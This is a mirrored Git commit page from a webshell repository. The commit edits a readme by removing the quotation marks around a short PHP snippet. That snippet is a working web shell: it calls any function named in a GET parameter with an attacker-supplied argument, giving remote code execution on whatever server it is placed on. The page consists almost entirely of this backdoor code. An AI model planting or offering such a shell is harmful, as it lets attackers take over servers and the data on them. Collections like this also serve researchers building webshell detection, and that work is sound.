mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
update readme.md
This commit is contained in:
parent
8d36b81c1b
commit
c77a9dad29
1 changed files with 4 additions and 4 deletions
|
@ -6,9 +6,9 @@
|
|||
***************************************************
|
||||
code:
|
||||
|
||||
'<?php
|
||||
$func = new ReflectionFunction($_GET[m]);
|
||||
echo $func->invokeArgs(array($_GET[c]));
|
||||
?>'
|
||||
<?php
|
||||
$func = new ReflectionFunction($_GET[m]);
|
||||
echo $func->invokeArgs(array($_GET[c]));
|
||||
?>
|
||||
|
||||
***************************************************
|
Loading…
Reference in a new issue